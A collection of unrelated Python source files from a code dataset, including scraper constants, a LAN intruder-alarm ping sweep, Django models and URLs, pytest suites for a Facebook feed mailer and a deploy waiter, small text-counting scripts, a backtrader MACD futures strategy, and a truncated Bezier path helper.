['Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/64.0.3282.140 Chrome/64.0.3282.140 Safari/537.36' ]\n\nPROXY_LIST = []\n\nPROXY = {\"https\": \"\"}\n\nHEADERS = {\n    \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Encoding\": \"gzip, deflate, br\",\n    \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"keep-alive\",\n    \"Content-Type\" : \"application/json;charset=UTF-8\",\n    \"User-Agent\": ''\n}\n\n\n# GOOD status response 200\nGOOD_STATUS = 200\n\n# BAD status response 503, it means Amazon has blocked us\nBAD_STATUS = 503\n\n# Page not found response 404\nPAGE_NOT_FOUND = 404\n\n\nMAX_RETRIES = 1\n\n# to compare with config.write_to value\nWRITE_TO_DB = 1\n\n# to compare with config.write_to value\nWRITE_TO_FILE = 2\n\n# to compare with config.write_to value\nWRITE_TO_CASSANDRA = 3\n\n# to compare with config.write_to value\n\n","sub_path":"Python_scripts/Global_Constants.py","file_name":"Global_Constants.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"459287527","text":"import socket\nimport multiprocessing\nimport subprocess\nimport os\nimport pygame\nimport time\nimport re\n\nfrom pygame import mixer\nfrom contextlib import contextmanager\nfrom termcolor import colored\n\n@contextmanager\ndef managed_file(name):\n    try:\n        f = open('ip_list.txt', 'r')\n        yield f\n\n    finally:\n        f.close()\n\n# Alarm function\ndef signaling():\n    print('\\n\\x1b[37;5;41m Detected unknown device !!! \\x1b[0m')\n    mixer.init()\n    song = mixer.music.load('./signaling.mp3')\n    clock = pygame.time.Clock()\n    mixer.music.play()\n    while True:\n        clock.tick(1000)\n    pygame.quit()\n\ndef pinger(job_q, results_q):\n    DEVNULL = open(os.devnull, 'w')\n    while True:\n        ip = job_q.get()\n        if ip is None:\n            break\n        try:\n            subprocess.check_call(['ping', '-c1', ip],\n                                  stdout=DEVNULL)\n            results_q.put(ip)\n        except:\n            pass\n\ndef get_my_ip():\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    s.connect((\"8.8.8.8\", 80))\n    ip = s.getsockname()[0]\n    s.close()\n    return ip\n\ndef map_network(pool_size=255):\n    ip_list = list()\n    # get our IP and build the base address\n    ip_parts = get_my_ip().split('.')\n    base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'\n    # prepare the job queue\n    jobs = multiprocessing.Queue()\n    results = multiprocessing.Queue()\n    pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]\n\n    for p in pool:\n        p.start()\n    # processes that ping the devices\n    for i in range(1, 255):\n        jobs.put(base_ip + '{0}'.format(i))\n    for p in pool:\n        jobs.put(None)\n    for p in pool:\n        p.join()\n    # collect the results\n    while not results.empty():\n        ip = results.get()\n        ip_list.append(ip)\n    return ip_list\n\n# Main function\ndef scanning(chois, scan_time = 10):\n    if chois == 1:\n        print(colored(' Scanning... ', 'red', 'on_cyan'))\n    elif chois == 2:\n        print(colored(' Scanning... 
', 'red', 'on_cyan'), ('---'), colored('[', 'yellow'), colored('Interval scanning'), colored(']', 'yellow'))\n    else: print(colored('Apparently an error occurred ...', 'red'))\n    lst = map_network()\n\n    # Build the IP whitelist\n    white_ip_list = []\n    with managed_file('ip_list.txt') as f:\n        read_ip_list = f.read().splitlines()\n        for ip in read_ip_list:\n            white_ip_list.append(ip)\n\n    # scan the collected results\n    gandon = []\n    for i in lst:\n        if i in white_ip_list: pass\n        else:\n            gandon.append(i)\n\n    # if unknown devices were detected\n    if len(gandon) > 0:\n        print(f'Detected {len(gandon)} intruders\\n')\n        for l in gandon:\n            print(f'\\x1b[0;31m{l}\\x1b[0m')\n        while True:\n            signaling()\n\n    else:\n        print(colored('[ -- ', 'cyan'),('No intruders in sight'), colored(' -- ] ', 'cyan'), colored('\\n\\nConnected devices:', 'green'))\n        for device in lst: print(colored(device, 'yellow'))\n        if chois == 2:\n            print(colored(f\"\\nWaiting {scan_time} seconds...\\n\", 'magenta'))\n            time.sleep(int(scan_time))\n","sub_path":"analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"577562011","text":"from django.db import models\n\n# Create your models here.\n\nclass content(models.Model):\n\theading = models.CharField(max_length=200)\n\tabout_topic = models.TextField()\n\timage=models.ImageField(upload_to='photos',null=True)\n\t\n\t\n","sub_path":"mobilegeek/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"399459903","text":"import sys # for sys.exit\ndef choose( *args ):\n\t\"\"\"\n\tAccepts a list of options,\n\tthen traps the player\n\tuntil it types one of them.\n\t\"\"\"\n\n\t# First prepare to print the list of options.\n\tstring = \"[\"\n#\targs.append( \"quit\" )\n\tfor choice in enumerate(args):\n\t\tstring += choice[1]\n\t\tif choice[0] != len(args) - 1:\n\t\t\tstring += \"/\"\n\tstring += \"] \"\n\n\t# Then get the choice.\n\tvalid = 0\n\twhile valid == 0:\n\t\tplayer_choice = raw_input( string )\n\t\tif player_choice in args:\n\t\t\tvalid = 1\n\t\telse:\n\t\t\tprint( \"Invalid response.\" )\n\t\n\tif player_choice == \"quit\":\n\t\tsys.exit()\n\n\treturn player_choice\n","sub_path":"tools/choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"438679031","text":"from injector import inject, AssistedBuilder\nfrom slippinj.cli.deploy_configuration import DeployConfiguration\n\n\nclass DefaultConfiguration(object):\n    \"\"\"Get the default configuration for the workflows\"\"\"\n\n    @inject(deploy_configuration=AssistedBuilder(DeployConfiguration), configuration_parser='configuration_parser')\n    def __init__(self, deploy_configuration, configuration_parser):\n        \"\"\"\n        Initialize the class\n        :param deploy_configuration: DeployConfiguration\n        :param configuration_parser: ConfigParser\n        \"\"\"\n        super(DefaultConfiguration, self).__init__()\n\n        self.__deploy_configuration = deploy_configuration\n        self.__configuration_parser = configuration_parser\n\n    def get(self, environment, arguments, workflow_configuration):\n        \"\"\"\n        Get configuration parameters that are common to the workflows\n        :param environment: string\n        :param arguments: Namespace\n        :param workflow_configuration: dict\n        :return: 
dict\n \"\"\"\n default_variables = ['hive_metastore_bucket', 'hdfs_deploy_folder']\n default_configuration = {}\n interactive_provided = False\n deploy_configuration = self.__deploy_configuration.build(environment=environment,\n configuration_parser=self.__configuration_parser)\n args = vars(arguments)\n\n for variable in default_variables:\n if variable in args and False != args[variable]:\n default_configuration[variable] = args[variable]\n interactive_provided = True\n elif variable in workflow_configuration:\n default_configuration[variable] = workflow_configuration[variable]\n elif deploy_configuration.get(variable):\n default_configuration[variable] = deploy_configuration.get(variable)\n else:\n default_configuration[variable] = raw_input(\n 'Please, provide the {var_name} value: '.format(var_name=variable.replace('-', ' ')))\n interactive_provided = True\n\n if interactive_provided and 'y' == (\n raw_input('Would you like to save the provided information in the config file: [Y/N] ')).lower():\n for key in default_configuration:\n deploy_configuration.set(key, default_configuration[key])\n\n return default_configuration\n","sub_path":"src/slippinj/cli/interactive/default_configuration.py","file_name":"default_configuration.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"95860277","text":"import re\r\nimport os\r\nimport urllib.request\r\nfrom collections import defaultdict\r\n# data provided\r\ntmp = os.getenv(\"TMP\", \"/tmp\")\r\ntmp = '/home/ch/programming/pybites/data'\r\nstopwords_file = os.path.join(tmp, 'stopwords')\r\nharry_text = os.path.join(tmp, 'harry')\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/stopwords.txt',\r\n stopwords_file\r\n)\r\nurllib.request.urlretrieve(\r\n 'https://bites-data.s3.us-east-2.amazonaws.com/harry.txt',\r\n harry_text\r\n)\r\nfreq = defaultdict(int)\r\nstopwords = list()\r\nwith open(stopwords_file) as stop:\r\n for line in stop:\r\n stopwords.append(line.strip())\r\n\r\ndef get_harry_most_common_word():\r\n with open(harry_text) as harry:\r\n count = 0\r\n for line in harry:\r\n count += 1\r\n line = re.sub(r\"'|,|\\.|;\",\"\",line).lower()\r\n for word in line.split():\r\n if word not in stopwords and word.isalpha():\r\n # with defaultdict:\r\n freq[word] += 1\r\n # without defaultdict: \r\n # if freq.get(word):\r\n # freq[word] += 1\r\n # else:\r\n # freq[word] = 1\r\n return sorted(freq.items(),key=lambda x: x[1])[-1]\r\n \r\n","sub_path":"18/submissions/save2_nopass.py","file_name":"save2_nopass.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"294835371","text":"fname = input(\"Enter the file name: \")\r\ntry:\r\n fhand = open(fname, 'r')\r\nexcept:\r\n print(\"File cannot be opened:\", fname)\r\n exit()\r\n\r\nemails = dict()\r\nfor line in fhand:\r\n if line.startswith(\"From \"):\r\n line = line.split()\r\n email = line[1]\r\n emails[email] = emails.get(email, 0) + 1\r\n\r\nprint(emails)\r\n","sub_path":"py4e-9-3.py","file_name":"py4e-9-3.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446745843","text":"''' Test the NewsFeedMonitor class '''\n\nimport configparser\nimport os\nimport uuid\n\nimport mock\nimport pytest\n\nfrom facebook_monitor_mailer.monitor import NewsFeedMonitor\n\n\nclass 
MockPost(object):\n    ''' Mock for posts returned by feed_posts '''\n    def __init__(self, post_id, flag=None, json_data=None):\n        self.post_id = post_id\n        self.flag = flag\n        self.json_data = json_data\n        self.flagged = mock.Mock(return_value=flag)\n        self.keywords = mock.Mock(return_value=['kw', post_id])\n        self.message_body = mock.Mock(return_value=post_id + '_body')\n\n\n@pytest.fixture\ndef monitor_config():\n    ''' Create config object from test_config.ini '''\n    config = configparser.ConfigParser()\n    config.read('tests/test_config.ini')\n    return config\n\n\n@pytest.fixture\ndef monitor(monitor_config):\n    ''' Simple monitor config '''\n    return NewsFeedMonitor(monitor_config)\n\n\n@mock.patch('requests.get')\n@mock.patch(\n    'facebook_monitor_mailer.monitor.NewsFeedPost.from_json',\n    side_effect=lambda data: data + '_processed')\ndef test_feed_posts(mock_post_from_json, mock_requests_get, monitor):\n    ''' test that data from a valid request is fed to the Post creator '''\n    # elaborate mock setup??\n    feed_data_json = mock.MagicMock()\n    feed_data_json.json = mock.MagicMock(return_value={\n        'data': ['post_1_data', 'post_2_data']})\n    mock_requests_get.return_value = feed_data_json\n    # run and test\n    posts = monitor.feed_posts()\n    mock_requests_get.assert_called_once_with(\n        'https://graph.facebook.com/v2.3/me/home', params={\n            'access_token': 'token', 'format': 'json'})\n    mock_post_from_json.assert_has_calls([\n        mock.call('post_1_data'), mock.call('post_2_data')])\n    assert posts == ['post_1_data_processed', 'post_2_data_processed']\n\n\n@mock.patch('requests.get')\ndef test_feed_posts_bad_data(mock_requests_get, monitor):\n    ''' Test correct exception raised ** and logged ** when request returns\n    bad result '''\n    # elaborate mock setup??\n    feed_data_json = mock.MagicMock()\n    feed_data_json.json = mock.MagicMock(return_value={'auth': 'failed'})\n    mock_requests_get.return_value = feed_data_json\n    # run and test\n    with pytest.raises(ValueError):\n        monitor.feed_posts()\n    feed_data_json.json.assert_called_once_with()\n    mock_requests_get.assert_called_once_with(\n        'https://graph.facebook.com/v2.3/me/home', params={\n            'access_token': 'token', 'format': 'json'})\n    # test that logging is also done on failure (patch log function)\n\n\n@mock.patch(\n    'facebook_monitor_mailer.monitor.NewsFeedMonitor.feed_posts',\n    return_value=[\n        MockPost('id1', True), MockPost('id2', False), MockPost('id3', True),\n        MockPost('id4', False)])\ndef test_flag_posts(mock_feed_posts, monitor):\n    ''' Check correct posts are processed and flagged, and records updated '''\n    monitor.processed_post_ids.update(['id1', 'id2'])\n    flagged_posts = monitor.flag_posts()\n    assert flagged_posts == [mock_feed_posts.return_value[2]]\n    assert not mock_feed_posts.return_value[0].flagged.called\n    assert not mock_feed_posts.return_value[1].flagged.called\n    mock_feed_posts.return_value[2].flagged.assert_called_once_with(\n        {'keywords': ['kw1', 'kw2']})\n    mock_feed_posts.return_value[3].flagged.assert_called_once_with(\n        {'keywords': ['kw1', 'kw2']})\n    # check numbers fed to logging\n    assert monitor.processed_post_ids == {'id1', 'id2', 'id3', 'id4'}\n    assert monitor.keyword_counter == {'id3': 1, 'id4': 1, 'kw': 2}\n\n\n@mock.patch(\n    'facebook_monitor_mailer.monitor.NewsFeedMonitor.feed_posts',\n    side_effect=ValueError)\ndef test_flag_posts_exception(mock_feed_posts, monitor):\n    ''' Test correct response if feed_posts throws an exception '''\n    assert monitor.flag_posts() == []\n    mock_feed_posts.assert_called_once_with()\n    # test that failure logging is 
done\n\n\n@mock.patch(\n 'pyramid_mailer.mailer.Mailer.from_settings')\ndef test_monitor_settings(mock_pyr_mailer, monitor_config):\n ''' Test correct parsing of settings structure to pyramid mailer '''\n monitor = NewsFeedMonitor(monitor_config)\n mock_pyr_mailer.assert_called_once_with({\n 'mail.host': 'host', 'mail.port': 123, 'mail.ssl': True,\n 'mail.username': 'username', 'mail.password': 'password'\n })\n assert monitor.post_flag_settings['keywords'] == ['kw1', 'kw2']\n assert monitor.access_token == 'token'\n\n\n@mock.patch(\n 'pyramid_mailer.message.Message', side_effect=['message1', 'message2'])\n@mock.patch('facebook_monitor_mailer.monitor.transaction')\ndef test_mail_flagged_posts(mock_transaction, mock_pyr_message, monitor):\n ''' Test correct construction and handling of emailing posts '''\n monitor.mailer = mock.MagicMock()\n posts = [MockPost('a1'), MockPost('a2')]\n monitor.flag_posts = mock.MagicMock(return_value=posts)\n monitor.mail_flagged_posts()\n monitor.flag_posts.assert_called_once_with()\n monitor.mailer.send.assert_has_calls([\n mock.call('message1'), mock.call('message2')])\n mock_pyr_message.assert_has_calls([\n mock.call(\n subject='NewsFeedMonitor flagged post with id a1',\n sender='username', recipients=['recipient'],\n body='a1_body'),\n mock.call(\n subject='NewsFeedMonitor flagged post with id a2',\n sender='username', recipients=['recipient'],\n body='a2_body')\n ])\n posts[0].message_body.assert_called_once_with()\n posts[1].message_body.assert_called_once_with()\n mock_transaction.commit.assert_called_once_with()\n\n\n@mock.patch('facebook_monitor_mailer.monitor.transaction')\ndef test_mail_no_flagged_posts(mock_transaction, monitor):\n ''' Test no errors when no flagged posts are returned '''\n monitor.mailer = mock.MagicMock()\n monitor.flag_posts = mock.MagicMock(return_value=[])\n monitor.mail_flagged_posts()\n monitor.flag_posts.assert_called_once_with()\n monitor.mailer.assert_not_called()\n mock_transaction.assert_not_called()\n\n\ndef test_shelve_unshelve(monitor_config):\n ''' Test that processed post ids can be stored '''\n # shelve from one monitor\n monitor1 = NewsFeedMonitor(monitor_config)\n monitor1.processed_post_ids.update([\n 'id1', 'id2', 'id3'])\n shelf_file = os.path.join('store', str(uuid.uuid4()))\n monitor1.shelve_processed(shelf_file)\n # unshelve from a new monitor reading the same file\n monitor2 = NewsFeedMonitor(monitor_config)\n monitor2.processed_post_ids.update([\n 'id4', 'id5'])\n monitor2.unshelve_processed(shelf_file)\n assert monitor2.processed_post_ids == {\n 'id1', 'id2', 'id3', 'id4', 'id5'}\n\n\ndef test_bad_shelve_unshelve(monitor):\n ''' Test handling of bad shelf file path without exceptions.\n TODO: log level warn should be given.'''\n # non-existent directory for files\n monitor.shelve_processed('store/store/shelf')\n monitor.unshelve_processed('store/store/shelf')\n # blank shelf file (no key to retrieve)\n monitor.unshelve_processed(os.path.join('store', str(uuid.uuid4())))\n","sub_path":"tests/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589596834","text":"\"\"\"Tests for wait_for_deploy\"\"\"\nfrom contextlib import contextmanager\n\nimport pytest\n\nfrom wait_for_deploy import wait_for_deploy\n\n\npytestmark = pytest.mark.asyncio\n\n\nasync def test_wait_for_deploy(mocker):\n \"\"\"wait_for_deploy should poll deployed web applications\"\"\"\n matched_hash = 
'match'\n    mismatch_hash = 'mismatch'\n    fetch_release_patch = mocker.patch('wait_for_deploy.fetch_release_hash', autospec=True, side_effect=[\n        mismatch_hash,\n        mismatch_hash,\n        matched_hash,\n    ])\n    check_output_patch = mocker.patch(\n        'wait_for_deploy.check_output',\n        autospec=True,\n        return_value=\" {} \".format(matched_hash).encode(),\n    )\n    validate_patch = mocker.patch('wait_for_deploy.validate_dependencies', autospec=True)\n\n    @contextmanager\n    def fake_init(*args, **kwargs):  # pylint: disable=unused-argument\n        \"\"\"Fake empty contextmanager\"\"\"\n        yield\n\n    init_working_dir_mock = mocker.patch('wait_for_deploy.init_working_dir', side_effect=fake_init)\n    sleep_sync_mock = mocker.Mock()\n\n    async def sleep_fake(*args, **kwargs):\n        \"\"\"await cannot be used with mock objects\"\"\"\n        sleep_sync_mock(*args, **kwargs)\n\n    mocker.patch('asyncio.sleep', sleep_fake)\n\n    repo_url = 'repo_url'\n    token = 'token'\n    hash_url = 'hash'\n    watch_branch = 'watch'\n    await wait_for_deploy(\n        github_access_token=token,\n        repo_url=repo_url,\n        hash_url=hash_url,\n        watch_branch=watch_branch,\n    )\n\n    validate_patch.assert_called_once_with()\n    check_output_patch.assert_called_once_with([\"git\", \"rev-parse\", \"origin/{}\".format(watch_branch)])\n    fetch_release_patch.assert_any_call(hash_url)\n    assert fetch_release_patch.call_count == 3\n    init_working_dir_mock.assert_called_once_with(token, repo_url)\n","sub_path":"wait_for_deploy_test.py","file_name":"wait_for_deploy_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"255629072","text":"\nimport ctypes\nimport weld\n\nconf = weld.WeldConf()\ncontext = weld.WeldContext(conf)\n\nmodule = weld.WeldModule(\"|x: i32| x + 10\", conf)\n\npointer = ctypes.POINTER(ctypes.c_int)\nb = ctypes.c_int(20)\n\nvalue = weld.WeldValue(ctypes.addressof(b))\nresult = module.run(context, value)\n\nty = module.return_type()\nprint(str(ty))\n\ndata = result.data()\ndata = ctypes.cast(data, pointer)\nprint(\"Result:\", data.contents)\nprint(\"Memory usage:\", context.memory_usage(), \"bytes\")\n\n\n# Try to compile a module that fails.\ntry:\n    module = weld.WeldModule(\"|x: i32| x + 10 + whoops\", conf)\nexcept weld.WeldError as e:\n    print(e)\n\n\n","sub_path":"weld-python/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"73512713","text":"def elective():\r\n    myDic = {'2CPR2B': 'C Language',\r\n             '1UNX1B': 'Intro to UNIX',\r\n             '3SH414': 'Shell Programming',\r\n             '4PL400': 'Perl Programming'}\r\n\r\n    sortedDic = iter(sorted(myDic.items())) #sorts the dict items by key\r\n\r\n    for key,value in sortedDic:\r\n        print (key,value) #prints the sorted key and value\r\n\r\n    while True:\r\n        enter = input('\\nEnter code number of course (-1 to exit)\\n')\r\n        if enter == '-1': #exit case\r\n            break\r\n\r\n        if enter in myDic.keys(): #if the key is present, print the course; 
otherwise do nothing\r\n            print(\"You will be taking\",myDic.get(enter),\"this semester.\")\r\n\r\nif __name__ == '__main__':\r\n    elective()","sub_path":"Python/Python Dictionary.py","file_name":"Python Dictionary.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"6104876","text":"from django.conf.urls import url, include\nfrom simplemooc.courses import views\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    #url(r'^(?P<pk>\\d+)/$', views.details, name='details'),\n    url(r'^(?P<slug>[\\w_-]+)/$', views.details, name='details'),\n    url(r'^(?P<slug>[\\w_-]+)/inscricao/$', views.enrollment, name='enrollment'),\n    url(r'^(?P<slug>[\\w_-]+)/cancelar-inscricao/$', views.undo_enrollment,\n        name='undo_enrollment'),\n    url(r'^(?P<slug>[\\w_-]+)/anuncios/$', views.announcements,\n        name='announcements'),\n    url(r'^(?P<slug>[\\w_-]+)/anuncios/(?P<pk>\\d+)/$', views.show_announcement,\n        name='show_announcement'),\n    url(r'^(?P<slug>[\\w_-]+)/aulas/$', views.lessons,\n        name='lessons'),\n    url(r'^(?P<slug>[\\w_-]+)/aulas/(?P<pk>\\d+)/$', views.lesson,\n        name='lesson'),\n    url(r'^(?P<slug>[\\w_-]+)/materiais/(?P<pk>\\d+)/$', views.material,\n        name='material'),\n]\n","sub_path":"simplemooc/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"132756621","text":"import backtrader as bt\nimport datetime as dt\nimport argparse\nimport DBconnect\nimport Const\n\ndatabase = None\ntrade_type = 0  # 0 is short, 1 is long\nNumberOfWins, NumberOfLoss, buytime, buyprice, total_trades, sum_profit = (0,) * 6\nPlaceOrdersAmt = 1\nStockNo = 'MTX00'\nAnalysisMode = 1  # 0 is execution, 1 is analysis\n\n\nclass TheStrategy(bt.Strategy):\n    params = (\n        # Standard MACD Parameters\n        ('macd1', 5),\n        ('macd2', 35),\n        ('macdsig', 5),\n        ('atrdist', 3.0),\n        ('onlydaily', False),\n    )\n\n    def __init__(self):\n        self.macd = bt.indicators.MACDHisto(self.data,\n                                            period_me1=self.p.macd1,\n                                            period_me2=self.p.macd2,\n                                            period_signal=self.p.macdsig)\n        self.atr = bt.indicators.ATR(self.data, period=8)\n\n        if not self.p.onlydaily:\n            self.sma_day5 = bt.ind.SMA(self.data1, period=5)\n            self.sma_day20 = bt.ind.SMA(self.data1, period=20)\n\n        self.sma_vol5 = bt.ind.SMA(self.data.volume, period=5)\n        self.sma_vol20 = bt.ind.SMA(self.data.volume, period=20)\n        self.sma_vol10 = bt.ind.SMA(self.data.volume, period=10)\n\n        self.data1.plotinfo.plot = True\n\n    def notify_trade(self, trade):\n        global sum_profit, total_trades, NumberOfWins, NumberOfLoss\n        if not trade.isclosed:\n            return\n\n        print('OPERATION PROFIT, GROSS %.2f, NET %.2f SUM %.2f ' % (trade.pnl, trade.pnlcomm, sum_profit))\n        if trade.pnl > 0:\n            NumberOfWins = NumberOfWins + 1\n        else:\n            NumberOfLoss = NumberOfLoss + 1\n        sum_profit = sum_profit + trade.pnl\n        total_trades = total_trades + 1\n        if trade.long:\n            self.pnl = trade.pnl\n        else:\n            self.pnl = -trade.pnl\n        # because True is 1, we need to convert it to 0, which represents buy\n        database.InsertPerfLog('TheStraAlpha', bt.num2date(trade.dtopen), bt.num2date(trade.dtclose), trade.price, trade.price + self.pnl, int(not trade.long))\n\n    def notify_order(self, order):\n        global buyprice, buytime\n        if order.status in [order.Submitted, order.Accepted]:\n            # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n            return\n\n        # Check if an order has been completed\n        # Attention: broker could reject order if not enough cash\n        if order.status in [order.Completed]:\n            if order.isbuy():\n                buyprice = 
order.executed.price\n buytime = bt.num2date(order.executed.dt)\n print('Buy EXECUTED, Time: %s, Price: %.2f ' % (bt.num2date(order.executed.dt), order.executed.price))\n else:\n buyprice = order.executed.price\n buytime = bt.num2date(order.executed.dt)\n print('Sell EXECUTED, Time: %s, Price: %.2f ' % (bt.num2date(order.executed.dt), order.executed.price))\n elif order.status in [order.Canceled, order.Margin]:\n print('%s ,' % order.Status[order.status])\n pass # Simply log\n self.order = None # indicate no order is pending\n\n def next(self):\n global total_trades, trade_type, buyprice, buytime\n\n settlement_day = False\n tradeopen = 0\n tradeclose = 0\n if (self.data.datetime.datetime().weekday() == 2 and 15 <= self.data.datetime.datetime().day <= 21) or \\\n (self.data.datetime.datetime().weekday() == 3 and 15 <= self.data.datetime.datetime().day <= 22):\n settlement_day = True\n\n if not self.position:\n if self.macd.signal[0] < 0 and self.macd[0] >= 0.0:\n trade_type = 1\n tradeopen = 1\n if self.macd.signal[0] >= 0 and self.macd[0] < 0:\n trade_type = 0\n tradeopen = 1\n pdist = self.atr[0] * self.p.atrdist\n buyprice = self.data0.close[0]\n self.pstop = self.data0.close[0] - pdist\n elif self.position:\n pclose = self.data.close[0]\n pstop = self.pstop\n\n if settlement_day and str(self.data.datetime.datetime().time()) == '13:25:00':\n tradeclose = 1\n elif (pstop > pclose) and trade_type == 1:\n tradeclose = 1\n elif (pstop > pclose + 30) and trade_type == 0:\n tradeclose = 1\n else:\n pdist = self.atr[0] * self.p.atrdist\n self.pstop = max(pstop, pclose - pdist)\n\n if tradeopen == 1 and trade_type == 0:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 0, AnalysisMode)\n if matched == 0:\n self.buy(data=self.datas[0])\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 0, PlaceOrdersAmt, buyprice, buyprice + 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeopen == 1 and trade_type == 1:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 1, AnalysisMode)\n if matched == 0:\n self.sell(data=self.datas[0])\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 1, PlaceOrdersAmt, buyprice, buyprice - 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeclose == 1 and trade_type == 0:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 1, AnalysisMode)\n if matched == 0:\n self.close(coc=True)\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 1, PlaceOrdersAmt, pclose, pclose + 2, Const.NoDayTrade, Const.TradeTypeROD)\n elif tradeclose == 1 and trade_type == 1:\n matched = database.CheckMatchedOrder(StockNo, self.data.datetime.datetime(), 0, AnalysisMode)\n if matched == 0:\n self.close(coc=True)\n database.InsertOrder(StockNo, self.data.datetime.datetime(), 0, PlaceOrdersAmt, pclose, pclose - 2, Const.NoDayTrade, Const.TradeTypeROD)\n\n\ndef runstrat(args=None):\n global sum_profit, total_trades, database, NumberOfWins, NumberOfLoss\n\n database = None\n database = DBconnect.DBconnect('localhost', 'trader', 'trader')\n database.Connect()\n\n database.InsertExecLog('3.1 Backtrader Starting')\n database.ClearPerfLog()\n\n args = parse_args(args)\n\n cerebro = bt.Cerebro()\n cerebro.broker.set_cash(args.cash)\n cerebro.broker.set_coc(True)\n\n fromdate = dt.datetime(2019, 7, 15)\n todate = dt.datetime(2019, 12, 31)\n\n data0 = bt.feeds.MySQLData(fromdate=fromdate, todate=todate, server='localhost', username='trader', password='trader', stockID='TX00', KLine='5', 
Session=1, timeframe=bt.TimeFrame.Minutes)\n data1 = bt.feeds.MySQLData(fromdate=fromdate, todate=todate, server='localhost', username='trader', password='trader', stockID='TX00', KLine='0', Session=1, timeframe=bt.TimeFrame.Days)\n\n cerebro.adddata(data0)\n cerebro.adddata(data1)\n\n # args for the strategy, period is a MUST why??\n cerebro.addstrategy(TheStrategy, onlydaily=args.onlydaily, )\n\n # cerebro.addstrategy(testStrategy,)\n cerebro.run()\n if total_trades == 0: total_trades = 1\n print('Sum of profit ', sum_profit)\n print('Number of trades ', total_trades)\n print('Profit per trans %.2f' % (sum_profit / total_trades))\n print('Total Fee in currency %.2f' % (total_trades * 50))\n print('Total profit in currency %.2f' % (sum_profit * 50 - total_trades * 50))\n print('Total wins %i ' % NumberOfWins)\n print('Total loss %i' % NumberOfLoss)\n print('Winning Percentage %.2f' % (NumberOfWins / total_trades * 100))\n cerebro.plot()\n\n\ndef parse_args(pargs=None):\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Sample for Tharp example with MACD')\n\n parser.add_argument('--cash', required=False, action='store',\n type=float, default=500000,\n help=('Cash to start with'))\n\n parser.add_argument('--period', default=50, required=False, type=int,\n help='Period to apply to indicator')\n\n parser.add_argument('--onlydaily', action='store_true',\n help='Indicator only to be applied to daily timeframe')\n\n if pargs is not None:\n return parser.parse_args(pargs)\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n runstrat()\n","sub_path":"SampleStragety.py","file_name":"SampleStragety.py","file_ext":"py","file_size_in_byte":8494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"128954364","text":"import string\n#crear un alfabeto\n\"\"\"def create_abc():\n for letter in range(ord('a'),ord('z')+1):\n print(chr(letter))\n\"\"\"\n\ndef encrypt(text, key): \n abc = string.ascii_lowercase # space = ASCII -> 32\n x = ''\n aux = 0\n for letter in text:\n if letter == ' ':\n x += '%'\n else:\n position = aux % len(key)\n x += abc[int((abc.index(letter) + int(abc.index(key[position]))) % len(abc))]\n aux+=1\n return x","sub_path":"54041-Daniel-Balda/Practica primer parcial/cifrado.py","file_name":"cifrado.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213839377","text":"import math\nimport bezier_conversion\n\nclass Coordinate:\n\tdef __init__(self, x, y, rot):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.rot = rot\n\n\tdef __repr__(self):\n\t\treturn(str(self.x) + \" \" + str(self.y) + \" \" + str(self.rot))\n\ndef create_path(start_x, start_y, start_rot, end_x, end_y, end_rot, handle_influence):\n\tangle_1 = start_rot\n\tx1, y1 = (start_x, start_y)\n\n\tangle_2 